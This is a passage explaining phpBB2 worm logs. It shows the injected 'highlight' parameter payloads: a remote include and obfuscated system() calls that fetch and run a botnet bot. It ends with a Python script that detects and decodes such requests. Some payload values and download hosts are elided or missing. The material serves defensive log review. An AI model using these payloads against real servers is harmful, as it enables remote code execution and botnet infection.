The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=

The worm checks whether the phpBB installation is vulnerable by fetching the following URL, which attempts to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) ... chr(34))%252E%2527

The following downloads software from
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103) ... chr(56))%252E%2527

Finally, a bot is downloaded and executed in an attempt to join a botnet:
/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101) ... chr(110)%252Echr(99)%252Echr(97))%252E%2527
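
For log review, the requests shown above can be flagged and decoded with a short script. This is an added example, not part of the original page or of the worm's code; the log lines, client addresses and timestamps are constructed, the request URIs are copied from the page with their "..." elisions kept, and the function names are assumptions of this sketch.

```python
import re
from urllib.parse import parse_qs, unquote

CHR_CALL = re.compile(r"chr\((\d{1,3})\)", re.IGNORECASE)
PHP_CALL = re.compile(r"\b(system|include|passthru|exec|eval)\s*\(", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/\d\.\d"')

def inspect_request(uri):
    """Return a finding dict for a suspicious viewtopic.php request, else None."""
    path, _, query = uri.partition("?")
    if not path.lower().endswith("viewtopic.php"):
        return None
    once = parse_qs(query, keep_blank_values=True).get("highlight", [""])[0]
    twice = unquote(once)  # second decode: the logged value is URL-encoded twice
    calls = sorted({name.lower() for name in PHP_CALL.findall(twice)})
    hidden = "".join(chr(int(n)) for n in CHR_CALL.findall(twice))
    reasons = []
    if "%27" in once:  # %2527 in the log becomes %27 after one decode
        reasons.append("double-encoded quote")
    if calls:
        reasons.append("PHP call: " + ",".join(calls))
    if hidden:
        reasons.append("chr() chain")
    if not reasons:
        return None
    return {"reasons": reasons, "decoded_highlight": twice, "chr_text": hidden}

def scan(lines):
    """Yield (request_uri, finding) for each flagged access-log line."""
    for line in lines:
        m = REQUEST.search(line)
        finding = inspect_request(m.group(1)) if m else None
        if finding:
            yield m.group(1), finding

# Constructed log lines; elided chr() values stay elided, so only visible ones decode.
LINE = '192.0.2.77 - - [01/Jan/2005:00:00:00 +0000] "GET %s HTTP/1.0" 200 812'
SAMPLE_LOG = [
    LINE % "/phpBB2/viewtopic.php?t=5&highlight=install+guide",
    LINE % "/phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=",
    LINE % ("/phpBB2/viewtopic.php?p=2024&highlight=%2527%252Esystem(chr(112)"
            "%252Echr(101)%252Echr(114) ... chr(34))%252E%2527"),
]

if __name__ == "__main__":
    for uri, finding in scan(SAMPLE_LOG):
        print(finding["reasons"], finding["decoded_highlight"])
```

An ordinary search-highlight request produces no finding, while both request shapes from this page are reported with the `highlight` value decoded to the PHP fragment it carries.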